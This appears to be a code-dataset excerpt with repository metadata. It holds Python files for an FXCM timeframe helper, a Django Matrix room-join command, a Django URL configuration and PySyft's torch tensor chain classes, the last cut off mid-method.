    elif unit == fxcorepy.O2GTimeFrameUnit.DAY:
        step = day
    elif unit == fxcorepy.O2GTimeFrameUnit.WEEK:
        step = 7 * day
    elif unit == fxcorepy.O2GTimeFrameUnit.MONTH:
        step = 30 * day
    else:
        # TICK and anything unknown fall back to one second per unit.
        step = 1
    return step * size
| 8,377 | 0 | 321 |
05ff2eee1834701da388e3350f5937c4d3038e22 | 1,635 | py | Python | extensions/matrix/management/commands/matrix_room_join.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | extensions/matrix/management/commands/matrix_room_join.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | extensions/matrix/management/commands/matrix_room_join.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | import logging
from django.core.management.base import BaseCommand, CommandError
from ngw.extensions.matrix import matrix
| 34.787234 | 79 | 0.593272 | import logging
from django.core.management.base import BaseCommand, CommandError
from ngw.extensions.matrix import matrix
class Command(BaseCommand):
    """Management command that makes a matrix user join a room."""
    # Bug fix: the old help string ('update matrix user information') was
    # copied from another command and did not describe this one.
    help = 'make a matrix user join a room'

    def add_arguments(self, parser):
        parser.add_argument(
            'user',
            help='user id (starting with @)',
        )
        parser.add_argument(
            'room',
            help='room id (starting with !) or room alias (starting with #)',
        )

    def handle(self, *args, **options):
        logger = logging.getLogger('command')
        # Map the command verbosity (0-3) onto a logging level; at the
        # default, settings['LOGGING']['command']['level'] is used.
        verbosity = options.get('verbosity', None)
        if verbosity == 3:
            logger.setLevel(logging.DEBUG)
        elif verbosity == 2:
            logger.setLevel(logging.INFO)
        elif verbosity == 1:
            logger.setLevel(logging.WARNING)
        elif verbosity == 0:
            logger.setLevel(logging.ERROR)

        user_id = options['user']
        if not user_id.startswith('@'):
            # No f-prefix needed: the message contains no placeholder.
            raise CommandError('user_id should start with "@".')
        if not user_id.endswith(f':{matrix.DOMAIN}'):
            raise CommandError(f'user_id should ends with ":{matrix.DOMAIN}".')

        room_id = options['room']
        if not room_id.startswith(('#', '!')):
            # Bug fix: the old implicit concatenation produced
            # "...should be and id (starting with !) oran alias..." —
            # a typo ("and" for "an") and a missing space between the parts.
            raise CommandError('room_id should be an id (starting with !) or '
                               'an alias (starting with #).')
        if not room_id.endswith(f':{matrix.DOMAIN}'):
            raise CommandError(f'room_id should ends with ":{matrix.DOMAIN}".')

        matrix.room_join(user_id, room_id)
| 1,383 | 104 | 23 |
0f586d06f7f6008b5af6b8a12581096e18f21c4a | 416 | py | Python | ps4you/ps4you/urls.py | bogomaz1987/ps4you | 7222425fb469dd966ba33de11405b9aa5e37ba67 | [
"Apache-2.0"
] | null | null | null | ps4you/ps4you/urls.py | bogomaz1987/ps4you | 7222425fb469dd966ba33de11405b9aa5e37ba67 | [
"Apache-2.0"
] | 2 | 2020-06-05T17:41:58.000Z | 2021-06-01T22:00:29.000Z | ps4you/ps4you/urls.py | bogomaz1987/ps4you | 7222425fb469dd966ba33de11405b9aa5e37ba67 | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
# path('searchableselect/', include('searchableselect.urls')),
path('', include('page.urls')),
path('game/', include('game.urls')),
path('client/', include('client.urls')),
path('auth/', include('social_django.urls', namespace='social'))
]
| 26 | 68 | 0.670673 | from django.conf.urls import include
from django.contrib import admin
from django.urls import path
# Root URL configuration: dispatch each prefix to the matching app's urlconf.
urlpatterns = [
    path('admin/', admin.site.urls),  # Django admin site
    # path('searchableselect/', include('searchableselect.urls')),
    path('', include('page.urls')),  # content pages at the site root
    path('game/', include('game.urls')),
    path('client/', include('client.urls')),
    # social-auth login/complete endpoints (python-social-auth)
    path('auth/', include('social_django.urls', namespace='social'))
]
| 0 | 0 | 0 |
c376f410b1597c029143f8b2507b3a11656225d2 | 44,416 | py | Python | syft/core/frameworks/torch/tensor.py | codevedas/PySyft | 8017b7f04434e797d0721e34488f637bf4865385 | [
"Apache-2.0"
] | null | null | null | syft/core/frameworks/torch/tensor.py | codevedas/PySyft | 8017b7f04434e797d0721e34488f637bf4865385 | [
"Apache-2.0"
] | null | null | null | syft/core/frameworks/torch/tensor.py | codevedas/PySyft | 8017b7f04434e797d0721e34488f637bf4865385 | [
"Apache-2.0"
] | null | null | null | import json
import re
import torch
import random
import syft as sy
from ... import utils
from . import utils as torch_utils
import logging
import numpy as np
class _SyftTensor(object):
"""
Super class for all Syft tensors, that contains all the specific syft functions
"""
def set_id(self, new_id):
"""
This changes the id of a tensor.
:param new_id: a string or integer id
:return: returns self, for convenience.
"""
if(new_id not in self.owner._objects):
if not hasattr(self, 'old_ids'):
self.old_ids = set()
self.old_ids.add(self.id)
self.owner.register_object(self, new_id)
return self
else:
raise KeyError("There is already a tensor with that ID - please choose another.")
@property
@parent.setter
@classmethod
def handle_call(cls, command, owner):
"""
Receive a command and an owner and before sending it downward the syft chain,
Performs different operations like:
- command substitution
- args substitution
- command overloading with special methods or arguments
"""
attr = command['command']
args = command['args']
kwargs = command['kwargs']
has_self = command['has_self']
# Overload methods
if has_self and cls.is_overloaded_method(attr):
self_ = command['self']
result = getattr(self_, attr)(*args, **kwargs)
# Overload functions
elif not has_self and cls.is_overloaded_function(attr):
overload_function = cls.overload_functions.get(attr)
result = overload_function(*args, **kwargs)
else:
# replace a function attr with an existing other
if attr in cls.replaced_functions():
command['command'] = cls.replaced_functions(attr)
# Or do whatever you want, but be careful not to overwrite the args!
# (...)
# Get the next node type and update in command tensorvar with tensorvar.child
next_command, child_type = torch_utils.prepare_child_command(
command, replace_tensorvar_with_child=True)
# Forward the call to the next child
result = child_type.handle_call(next_command, owner)
if result is None:
return result
if not isinstance(result, (int, float, str, bool)):
# Insert the new node just before the wrapper
syft_response = cls.syft_wrap(result, owner)
else:
syft_response = result
return syft_response
def ser(self, private, as_dict=True):
"""
General method for serializing a Syft object. Specific tensors like _PointerTensor
should overload this method.
"""
data = {
'owner': self.owner.id,
'id': self.id,
'torch_type': self.torch_type
}
if self.child is not None and not torch_utils.is_tensor(self.child):
data['child'] = self.child.ser(private, as_dict)
if as_dict:
return {'__{}__'.format(self.__class__.__name__): data}
else:
return json.dumps({'__{}__'.format(self.__class__.__name__): data}) + "\n"
@classmethod
def deser_routing(cls, dct, worker, acquire):
"""
Method analysing the dict given to see which Syft Tensor should deserialized,
and forwarding the call
[Is this case note that the dct param is assumed to have a single key, which is
compatible with our encode/decode process (ex: {'___PointerTensor__': {...} })]
"""
pat = re.compile('__(.+)__')
for key, obj in dct.items(): # A trick, we don't really loop
obj_type = pat.search(key).group(1)
if torch_utils.is_syft_tensor(obj_type):
if obj_type == '_LocalTensor':
return sy._LocalTensor.deser(obj, worker, acquire)
elif obj_type == '_PointerTensor':
return sy._PointerTensor.deser(obj, worker, acquire)
else:
syft_type = torch.guard['syft.' + obj_type]
return syft_type.deser(obj, worker, acquire)
@classmethod
def deser(cls, msg_obj, worker, acquire):
"""
General method for de-serializing a Syft object. Specific tensors like _PointerTensor
should overload this method.
"""
if acquire: # We need to register the info given
syft_obj = cls(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
owner=worker,
id=msg_obj['id'],
skip_register=True
)
if 'child' in msg_obj:
syft_child = cls.deser_routing(msg_obj['child'], worker, acquire)
syft_obj.child = syft_child
syft_child.parent = syft_obj
else: # We point at the info which generally we can't really have
# We make sure we are not creating a duplicate pointer
previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
if previous_pointer is None:
syft_obj = sy._PointerTensor(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
location=msg_obj['owner'],
id_at_location=msg_obj['id'],
owner=worker,
id=None,
skip_register=True)
else:
syft_obj = previous_pointer
return syft_obj
def on(self, wrapper):
"""
Used to add a new node at the top of the chain, just before the tensorvar wrapper
Example with _PlusIsMinusTensor:
x = sy.FloatTensor([1, 2, 3]) # the chain is FloatTensor > _LocalTensor
x = sy._PlusIsMinusTensor().on(x) # the chain is FloatTensor > _PlusIsMinusTensor > _LocalTensor
"""
cls = type(self)
# Assign the newly created tensor to the good owner and torch_type
self.torch_type = wrapper.child.torch_type
self.owner = wrapper.child.owner
# Insert self between wrapper and wrapper child
torch_utils.wrap_command_with(wrapper.child, wrapper=self)
torch_utils.wrap_command_with(self, wrapper=wrapper)
# In case wrapper is a variable, do the same with data and grad (if necessary)
if torch_utils.is_variable(wrapper):
wrapper.data = cls().on(wrapper.data)
if torch_utils.is_variable(wrapper.grad):
wrapper.grad = cls().on(wrapper.grad)
if wrapper.grad is None and wrapper.data.dim() > 0:
# create an empty envelope in wrapper.grad
wrapper.init_grad_()
# Build the chain with _PlusIsMinusTensor
wrapper_grad = cls().on(wrapper.grad)
# Insert the gradient within its chain
wrapper.grad.native_set_(wrapper_grad)
return wrapper
def wrap(self):
"""
Wrap a syft node with a torch wrapper
"""
wrapper = torch.guard[self.torch_type]()
self.owner.rm_obj(wrapper.child.id)
wrapper.child = self
torch_utils.fix_chain_ends(wrapper)
return wrapper
@classmethod
def syft_wrap(cls, result, owner):
"""
Wrap a torch node with a syft wrapper
"""
# Insert the new syft node just before the wrapper
syft_wrapper = cls(child=result, owner=owner)
result.parent = syft_wrapper
if torch_utils.is_variable(result.torch_type):
syft_response_data = cls(child=result.data, owner=owner)
result.data.parent = syft_response_data
syft_wrapper.data = syft_response_data
# TODO: same for grad ?
return syft_wrapper
@classmethod
def is_overloaded_method(cls, attr):
"""
State if a function name corresponds to a Syft Tensor method which
overloads a torch method
"""
exclude = ['on', '__init__', 'native___init__', '__repr__', '__str__', 'create_pointer',
'ser', 'deser', 'handle_call']
if attr in exclude:
return False
if hasattr(getattr(cls, attr), '__module__') \
and getattr(cls, attr).__module__ == 'syft.core.frameworks.torch.tensor':
return True
return False
@classmethod
def is_overloaded_function(cls, attr):
"""
State if a function name corresponds to an overloaded function by the Syft
tensor, which declared the corresponding overloading function in
cls.overload_functions
"""
attr = attr.split('.')[-1]
overloaded_functions = [
func for func in dir(cls.overload_functions)
if re.match(r'__(.*)__', func) is None
and func != 'get'
]
return attr in overloaded_functions
@classmethod
def replaced_functions(cls, attr=None):
"""
If attr is none, return all the function substitution a Syft Tensor class
wants to perform.
Else, return the substitution corresponding to attr
"""
if attr is None:
return cls.substitution_table
else:
return cls.substitution_table[attr]
substitution_table = {}
class _PlusIsMinusTensor(_SyftTensor):
"""
Example of a custom overloaded _SyftTensor
Role:
Converts all add operations into sub/minus ones.
"""
# The table of command you want to replace
substitution_table = {
'torch.add': 'torch.add'
}
class overload_functions:
"""
Put here the functions you want to overload
Beware of recursion errors.
"""
@staticmethod
@staticmethod
# Put here all the methods you want to overload
def add(self, arg):
"""
Overload the add method and execute another function or method with the provided args
"""
_response = self.sub(arg)
return _response
def abs(self):
"""
Overload the abs() method and execute another function
"""
return torch.abs(self)
class _TorchObject(object):
    """
    This tensor is simply a more convenient way to add custom
    functions to all Torch tensor types, including Torch Variable.
    Note that it is the parent class of the two following classes:
    _TorchTensor and a_TorchVariable
    """
    __module__ = 'syft'
    def move(self, worker, new_id=None):
        """
        Give the end leaf of the chain to worker,
        just like if the last elmt was send its child
        to worker
        self->alice->obj [worker] => self->alice->worker->obj
        """
        raise NotImplementedError('Move is not supported anymore.')
        # NOTE(review): everything below the raise is unreachable dead code,
        # apparently kept from the previous implementation for reference.
        if isinstance(worker, (int, str)):
            worker = self.owner.get_worker(worker)
        if new_id is None:
            new_id = random.randint(0, 10e10)
        if isinstance(self.child, sy._PointerTensor):
            pointer = self.child
        else:
            pointer = None
        if pointer is None:
            return self.send(worker, new_id)
        command, _ = pointer.compile_command('move',
                                             (worker.id, new_id),
                                             {},
                                             True)
        response = pointer.owner.send_torch_command(recipient=pointer.location,
                                                    message=command)
        return self
| 40.014414 | 134 | 0.579431 | import json
import re
import torch
import random
import syft as sy
from ... import utils
from . import utils as torch_utils
import logging
import numpy as np
class _SyftTensor(object):
"""
Super class for all Syft tensors, that contains all the specific syft functions
"""
    def __init__(self, child=None, parent=None, torch_type=None, owner=None, id=None, skip_register=False):
        """Build a Syft tensor node and link it into the chain.

        When *child* is itself a Syft tensor, torch_type and owner default
        to the child's values. *owner* may be a worker object or a worker id
        (resolved through the child's owner).
        NOTE(review): when owner resolves to None, self.owner is never
        assigned — callers appear to always provide one; confirm.
        """
        if torch_utils.is_syft_tensor(child):
            if torch_type is None:
                torch_type = child.torch_type
            if owner is None:
                owner = child.owner
        self.id = id
        # self.old_ids = None - this will only get initialized if self.set_id() is called, but i'm referencing it
        # in this comment so that people know it can exist. It's a set()
        self.child = child
        self.parent = parent
        self.torch_type = torch_type
        if self.child is not None:
            try:
                self.child.parent = self
            except AttributeError: # for non-torch tensor child (can occur in __repr__)
                pass
        if owner is not None:
            if not isinstance(owner, sy.core.workers.BaseWorker):
                owner = self.child.owner.get_worker(owner)
            self.owner = owner
def __str__(self):
return "[" + type(self).__name__ + " - id:" + str(self.id) + " owner:" + str(
self.owner.id) + "]"
def __repr__(self):
return self.__str__()
def set_id(self, new_id):
"""
This changes the id of a tensor.
:param new_id: a string or integer id
:return: returns self, for convenience.
"""
if(new_id not in self.owner._objects):
if not hasattr(self, 'old_ids'):
self.old_ids = set()
self.old_ids.add(self.id)
self.owner.register_object(self, new_id)
return self
else:
raise KeyError("There is already a tensor with that ID - please choose another.")
@property
def parent(self):
if hasattr(self, '_parent') and self._parent is not None:
return self._parent
else:
return None # Parents should be manually specified
    @parent.setter
    def parent(self, value):
        # Store on the backing attribute that the getter reads.
        self._parent = value
    @classmethod
    def handle_call(cls, command, owner):
        """
        Receive a command and an owner and before sending it downward the syft chain,
        Performs different operations like:
        - command substitution
        - args substitution
        - command overloading with special methods or arguments

        command is a dict with keys 'command', 'args', 'kwargs', 'has_self'
        (and 'self' when has_self is true). Non-primitive results are
        re-wrapped in a node of this class before being returned.
        """
        attr = command['command']
        args = command['args']
        kwargs = command['kwargs']
        has_self = command['has_self']
        # Overload methods
        if has_self and cls.is_overloaded_method(attr):
            self_ = command['self']
            result = getattr(self_, attr)(*args, **kwargs)
        # Overload functions
        elif not has_self and cls.is_overloaded_function(attr):
            overload_function = cls.overload_functions.get(attr)
            result = overload_function(*args, **kwargs)
        else:
            # replace a function attr with an existing other
            if attr in cls.replaced_functions():
                command['command'] = cls.replaced_functions(attr)
            # Or do whatever you want, but be careful not to overwrite the args!
            # (...)
            # Get the next node type and update in command tensorvar with tensorvar.child
            next_command, child_type = torch_utils.prepare_child_command(
                command, replace_tensorvar_with_child=True)
            # Forward the call to the next child
            result = child_type.handle_call(next_command, owner)
        if result is None:
            return result
        if not isinstance(result, (int, float, str, bool)):
            # Insert the new node just before the wrapper
            syft_response = cls.syft_wrap(result, owner)
        else:
            # Primitive results pass through unwrapped.
            syft_response = result
        return syft_response
    def create_pointer(self, parent=None, ptr_id=None, owner=None, location=None,
                       id_at_location=None, register=False):
        """Build (or reuse) a _PointerTensor aimed at this tensor.

        owner/location accept worker objects or worker ids; by default the
        pointer is owned by this tensor's owner and points at itself.
        When register is False the freshly created pointer is immediately
        de-registered from its owner.
        """
        if owner is None:
            owner = self.owner
        if isinstance(owner, (str, int)):
            owner = self.owner.get_worker(owner)
        local_pointer = False
        if location is None:
            location = self.owner.id
            local_pointer = True
        if id_at_location is None:
            id_at_location = self.id
        if ptr_id is not None:
            if ptr_id == id_at_location:
                raise AttributeError(
                    "The PointerTensor and the tensor being pointed to cannot have the same id.")
        else:
            # Normally if there is no id specified, we keep the same as the original pointer
            # Except if the pointer is local (we don't want to overwrite it!)
            if not local_pointer:
                ptr_id = self.id
            else:
                ptr_id = random.randint(0, 10e10)
        if hasattr(self, 'torch_type') and self.torch_type is not None:
            torch_type = self.torch_type
        else:
            torch_type = None
            logging.warning("The torch tensor's child has no torch_type. Is it well formed?")
        # Reuse an existing pointer to the same (location, id) when one exists.
        previous_pointer = owner.get_pointer_to(location, id_at_location)
        if previous_pointer is None:
            ptr = _PointerTensor(child=None,
                                 parent=parent,
                                 id=ptr_id,
                                 torch_type=torch_type,
                                 location=location,
                                 id_at_location=id_at_location,
                                 owner=owner,
                                 skip_register=(not register))
            if not register:
                ptr.owner.rm_obj(ptr.id)
        else:
            ptr = previous_pointer
        return ptr
    def ser(self, private, as_dict=True):
        """
        General method for serializing a Syft object. Specific tensors like _PointerTensor
        should overload this method.

        Returns a dict keyed by '__<ClassName>__' (or its JSON string when
        as_dict is False). Non-torch children are serialized recursively.
        """
        data = {
            'owner': self.owner.id,
            'id': self.id,
            'torch_type': self.torch_type
        }
        if self.child is not None and not torch_utils.is_tensor(self.child):
            data['child'] = self.child.ser(private, as_dict)
        if as_dict:
            return {'__{}__'.format(self.__class__.__name__): data}
        else:
            return json.dumps({'__{}__'.format(self.__class__.__name__): data}) + "\n"
    @classmethod
    def deser_routing(cls, dct, worker, acquire):
        """
        Method analysing the dict given to see which Syft Tensor should deserialized,
        and forwarding the call

        [Is this case note that the dct param is assumed to have a single key, which is
        compatible with our encode/decode process (ex: {'___PointerTensor__': {...} })]
        """
        pat = re.compile('__(.+)__')
        for key, obj in dct.items():  # A trick, we don't really loop
            obj_type = pat.search(key).group(1)
            if torch_utils.is_syft_tensor(obj_type):
                if obj_type == '_LocalTensor':
                    return sy._LocalTensor.deser(obj, worker, acquire)
                elif obj_type == '_PointerTensor':
                    return sy._PointerTensor.deser(obj, worker, acquire)
                else:
                    # Any other Syft tensor type is resolved through the torch guard.
                    syft_type = torch.guard['syft.' + obj_type]
                    return syft_type.deser(obj, worker, acquire)
    @classmethod
    def deser(cls, msg_obj, worker, acquire):
        """
        General method for de-serializing a Syft object. Specific tensors like _PointerTensor
        should overload this method.

        acquire=True rebuilds the object locally (recursing into 'child');
        acquire=False instead creates (or reuses) a pointer to the remote
        original.
        """
        if acquire: # We need to register the info given
            syft_obj = cls(child=None,
                           parent=None,
                           torch_type=msg_obj['torch_type'],
                           owner=worker,
                           id=msg_obj['id'],
                           skip_register=True
                           )
            if 'child' in msg_obj:
                syft_child = cls.deser_routing(msg_obj['child'], worker, acquire)
                syft_obj.child = syft_child
                syft_child.parent = syft_obj
        else: # We point at the info which generally we can't really have
            # We make sure we are not creating a duplicate pointer
            previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
            if previous_pointer is None:
                syft_obj = sy._PointerTensor(child=None,
                                             parent=None,
                                             torch_type=msg_obj['torch_type'],
                                             location=msg_obj['owner'],
                                             id_at_location=msg_obj['id'],
                                             owner=worker,
                                             id=None,
                                             skip_register=True)
            else:
                syft_obj = previous_pointer
        return syft_obj
    def on(self, wrapper):
        """
        Used to add a new node at the top of the chain, just before the tensorvar wrapper

        Example with _PlusIsMinusTensor:
        x = sy.FloatTensor([1, 2, 3])       # the chain is FloatTensor > _LocalTensor
        x = sy._PlusIsMinusTensor().on(x)   # the chain is FloatTensor > _PlusIsMinusTensor > _LocalTensor
        """
        cls = type(self)
        # Assign the newly created tensor to the good owner and torch_type
        self.torch_type = wrapper.child.torch_type
        self.owner = wrapper.child.owner

        # Insert self between wrapper and wrapper child
        torch_utils.wrap_command_with(wrapper.child, wrapper=self)
        torch_utils.wrap_command_with(self, wrapper=wrapper)

        # In case wrapper is a variable, do the same with data and grad (if necessary)
        if torch_utils.is_variable(wrapper):
            wrapper.data = cls().on(wrapper.data)
            if torch_utils.is_variable(wrapper.grad):
                wrapper.grad = cls().on(wrapper.grad)
            if wrapper.grad is None and wrapper.data.dim() > 0:
                # create an empty envelope in wrapper.grad
                wrapper.init_grad_()
                # Build the chain with _PlusIsMinusTensor
                wrapper_grad = cls().on(wrapper.grad)
                # Insert the gradient within its chain
                wrapper.grad.native_set_(wrapper_grad)

        return wrapper
    def wrap(self):
        """
        Wrap a syft node with a torch wrapper
        """
        # Instantiate an empty torch wrapper of the right type; its auto-created
        # child is discarded (de-registered) and replaced with self.
        wrapper = torch.guard[self.torch_type]()
        self.owner.rm_obj(wrapper.child.id)
        wrapper.child = self
        torch_utils.fix_chain_ends(wrapper)
        return wrapper
    @classmethod
    def syft_wrap(cls, result, owner):
        """
        Wrap a torch node with a syft wrapper
        """
        # Insert the new syft node just before the wrapper
        syft_wrapper = cls(child=result, owner=owner)
        result.parent = syft_wrapper

        # Variables also need their .data chain wrapped so both chains stay aligned.
        if torch_utils.is_variable(result.torch_type):
            syft_response_data = cls(child=result.data, owner=owner)
            result.data.parent = syft_response_data
            syft_wrapper.data = syft_response_data
            # TODO: same for grad ?

        return syft_wrapper
    @classmethod
    def is_overloaded_method(cls, attr):
        """
        State if a function name corresponds to a Syft Tensor method which
        overloads a torch method
        """
        # These names are infrastructure, never torch-method overloads.
        exclude = ['on', '__init__', 'native___init__', '__repr__', '__str__', 'create_pointer',
                   'ser', 'deser', 'handle_call']
        if attr in exclude:
            return False
        # A method defined in the syft tensor module (rather than inherited
        # from torch) is considered an overload.
        if hasattr(getattr(cls, attr), '__module__') \
                and getattr(cls, attr).__module__ == 'syft.core.frameworks.torch.tensor':
            return True
        return False
    @classmethod
    def is_overloaded_function(cls, attr):
        """
        State if a function name corresponds to an overloaded function by the Syft
        tensor, which declared the corresponding overloading function in
        cls.overload_functions
        """
        # Compare only the trailing name (e.g. 'torch.add' -> 'add').
        attr = attr.split('.')[-1]
        # Collect the public names declared on overload_functions, skipping
        # dunders and the 'get' dispatcher itself.
        overloaded_functions = [
            func for func in dir(cls.overload_functions)
            if re.match(r'__(.*)__', func) is None
            and func != 'get'
        ]
        return attr in overloaded_functions
    @classmethod
    def replaced_functions(cls, attr=None):
        """
        If attr is none, return all the function substitution a Syft Tensor class
        wants to perform.
        Else, return the substitution corresponding to attr
        """
        if attr is None:
            return cls.substitution_table
        else:
            # Raises KeyError if no substitution was declared for attr.
            return cls.substitution_table[attr]
    # Mapping of torch function names to their replacements; subclasses
    # override this to reroute specific torch functions (see replaced_functions).
    substitution_table = {}

    class overload_functions:
        # Namespace holding overloaded-function implementations; empty by
        # default, populated by subclasses such as _PlusIsMinusTensor.
        pass
class _LocalTensor(_SyftTensor):
    """
    Syft tensor that sits at the end of a chain and executes commands
    locally on the underlying native torch tensor.
    """

    def __init__(self, child=None, parent=None, torch_type=None, owner=None, id=None, skip_register=False):
        super().__init__(child=child, parent=parent, torch_type=torch_type, owner=owner, id=id,
                         skip_register=skip_register)

    @classmethod
    def handle_call(cls, syft_command, owner):
        """
        Execute a forwarded command on the native tensor with native operations.
        Receive a syft command and an owner, and converts it into command with
        native torch args. Excute native operations and converts it back into
        syft response using _LocalTensors.
        """
        # Strip the syft layer off every tensorvar in the command.
        tensor_command, torch_type = torch_utils.prepare_child_command(syft_command,
                                                                       replace_tensorvar_with_child=True)
        torch_utils.assert_has_only_torch_tensorvars(tensor_command)

        attr = tensor_command['command']
        args = tensor_command['args']
        kwargs = tensor_command['kwargs']
        has_self = tensor_command['has_self']

        if has_self:
            # Method call: dispatch to the 'native_' alias on the tensor itself.
            self = tensor_command['self']
            attr = torch._command_guard(attr, torch.tensorvar_methods)
            command = getattr(self, "native_" + attr)
        else:
            # Module-level function: rewrite e.g. 'torch.add' -> 'torch.native_add'.
            attr = torch._command_guard(attr, torch.torch_modules)
            elems = attr.split('.')
            elems[-1] = 'native_' + elems[-1]
            native_func_name = '.'.join(elems)
            command = eval(native_func_name)
        response = command(*args, **kwargs)

        # TODO : control registration process
        if response is None:
            return response

        # On a remote worker, promote plain scalars/arrays into torch tensors
        # so they can travel back through the chain; locally they can be
        # returned as-is.
        if owner.id != owner.hook.local_worker.id:
            if isinstance(response, (int, float, bool)):
                response = sy.zeros(1) + response
            elif isinstance(response, (np.ndarray, )):
                response = sy.FloatTensor(response)
        else:
            if isinstance(response, (int, float, bool, np.ndarray)):
                return response

        # If the command is an in-place method, wrap self and return
        if has_self and utils.is_in_place_method(attr):
            # wrap the main element
            torch_utils.wrap_command_with(response, syft_command['self'])
            if torch_utils.is_variable(response):
                # Also wrap the data if it's a variable (don't use wrap_command_with: the chain is not well formed yet)
                syft_command['self'].child.data = response.data
                response.data.parent = syft_command['self'].child.data.parent
                # And wrap the grad if there is one
                if response.grad is not None:
                    if response.grad.data.dim() > 0:
                        syft_command['self'].child.grad = response.grad
                    else:
                        syft_command['self'].child.grad.native_set_()
                    response.grad.parent = syft_command['self'].child.grad.parent
                # Finally, fix the links .data and .grad
                if response.grad is None:
                    torch_utils.link_var_chain_to_data_chain(syft_command['self'], response.data.child)
                else:
                    torch_utils.link_var_chain_to_data_and_grad_chains(syft_command['self'], response.data.child, response.grad.child)
            return_response = syft_command['self']
        # Else, the response if not self. Iterate over the response(s) and wrap with a syft tensor
        else:
            responses = response if isinstance(response, tuple) else (response,)
            syft_responses = []
            for resp in responses:
                if resp is None:  # Don't wrap None
                    syft_responses.append(resp)
                    continue

                if isinstance(resp, (int, float, bool)):
                    # if not final worker, convert into Float Tensor, which comes with a _LocalTensor
                    if owner.id != owner.hook.local_worker.id:
                        resp = sy.zeros(1) + resp
                    else:  # Else don't wrap it
                        syft_responses.append(resp)
                        continue

                syft_response = sy._LocalTensor(child=resp, parent=resp, owner=owner,
                                                torch_type='syft.' + type(resp).__name__)

                if torch_utils.is_variable(resp):
                    if resp.grad is None:
                        torch_utils.link_var_chain_to_data_chain(syft_response, resp.data.child)
                    else:
                        torch_utils.link_var_chain_to_data_and_grad_chains(syft_response, resp.data.child, resp.grad.child)

                syft_responses.append(syft_response)

            return_response = tuple(syft_responses) if len(syft_responses) > 1 else syft_responses[0]

        return return_response

    def ser(self, private, as_dict=True):
        # Serialize only the bookkeeping info; the native data is serialized
        # by the torch wrapper, not here.
        data = {
            'owner': self.owner.id,
            'id': self.id,
            'torch_type': self.torch_type
        }
        if as_dict:
            return {'___LocalTensor__': data}
        else:
            return json.dumps({'___LocalTensor__': data}) + "\n"

    @staticmethod
    def deser(msg_obj, worker, acquire):
        if 'owner' not in msg_obj:
            raise TypeError("sy._LocalTensor can't deserialize a non-valid sy._LocalTensor. "
                            "Do you wan to call sy.FloatTensor.deser() instead?")
        if msg_obj['owner'] == worker.id:
            logging.warning('_LocalTensor sent to itself')
        if acquire:  # We need to register the info given
            syft_obj = sy._LocalTensor(child=None,
                                       parent=None,
                                       torch_type=msg_obj['torch_type'],
                                       owner=worker,
                                       id=msg_obj['id'],
                                       skip_register=True
                                       )
        else:  # We point at the info which generally we can't really have
            # We make sure we are not creating a duplicate pointer
            previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
            if previous_pointer is None:
                syft_obj = sy._PointerTensor(child=None,
                                             parent=None,
                                             torch_type=msg_obj['torch_type'],
                                             location=msg_obj['owner'],
                                             id_at_location=msg_obj['id'],
                                             owner=worker,
                                             id=None,
                                             skip_register=True)
            else:
                syft_obj = previous_pointer
        return syft_obj

    def get(self, parent, deregister_ptr=None):
        # A _LocalTensor already holds its data locally; .get() is only
        # meaningful on pointers.
        raise TypeError("Cannot call .get() on a tensor you already have.")
class _PlusIsMinusTensor(_SyftTensor):
    """
    Example of a custom overloaded _SyftTensor

    Role:
    Converts all add operations into sub/minus ones.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    # The table of command you want to replace
    substitution_table = {
        'torch.add': 'torch.add'
    }

    class overload_functions:
        """
        Put here the functions you want to overload
        Beware of recursion errors.
        """
        @staticmethod
        def add(x, y):
            # Route the functional form through the method form so the
            # overloaded add() below (which actually subtracts) is applied.
            return x.add(y)

        @staticmethod
        def get(attr):
            # Resolve e.g. 'torch.add' to the static function above.
            attr = attr.split('.')[-1]
            return getattr(sy._PlusIsMinusTensor.overload_functions, attr)

    # Put here all the methods you want to overload
    def add(self, arg):
        """
        Overload the add method and execute another function or method with the provided args
        """
        _response = self.sub(arg)
        return _response

    def abs(self):
        """
        Overload the abs() method and execute another function
        """
        return torch.abs(self)
class _PointerTensor(_SyftTensor):
    """
    Syft tensor that holds no data itself but points at a tensor living on
    another worker (identified by location / id_at_location).
    """

    def __init__(self, child, parent, torch_type, location=None, id_at_location=None, id=None,
                 owner=None, skip_register=False):
        super().__init__(child=child, parent=parent, torch_type=torch_type, owner=owner, id=id,
                         skip_register=skip_register)
        if location is None:
            raise AttributeError("Pointer must have a location specified")
        self.location = self.owner.get_worker(location)
        self.id_at_location = id_at_location
        self.torch_type = torch_type

        self.register_pointer()

        # pointers to themselves that get registered should trigger the flat
        # if it's not getting registered the pointer is probably about to be
        # sent over the wire
        if self.location == self.owner and not skip_register:
            logging.warning("Do you really want a pointer pointing to itself? (self.location == self.owner)")

    def register_pointer(self):
        """Record this pointer in the owner's remote-address book."""
        worker = self.owner
        location = self.location.id
        id_at_location = self.id_at_location
        # Add the remote location worker key if needed
        if location not in worker._pointers.keys():
            worker._pointers[location] = {}
        # Add the remote address
        worker._pointers[location][id_at_location] = self.id

    @classmethod
    def handle_call(cls, syft_command, owner):
        """
        _PointerTensor has an overloaded handle_call function because it converts
        the command to torch tensors and send it over the network
        """
        tensor_command = torch_utils.wrap_command(syft_command)

        attr = tensor_command['command']
        args = tensor_command['args']
        kwargs = tensor_command['kwargs']
        has_self = tensor_command['has_self']
        self_ = tensor_command['self'] if has_self else None

        command, locations, owners = torch_utils.compile_command(attr,
                                                                 args,
                                                                 kwargs,
                                                                 has_self=has_self,
                                                                 self=self_)
        location = locations[0]
        owner = owners[0]

        # Else we send the command
        response = owner.send_torch_command(recipient=location, message=command)

        torch_utils.assert_has_only_torch_tensorvars(response)

        # If the command is an in-place method, we only need to return the same wrapper to the same
        # pointer, instead of returning the new wrapper created in response
        if has_self and utils.is_in_place_method(attr):
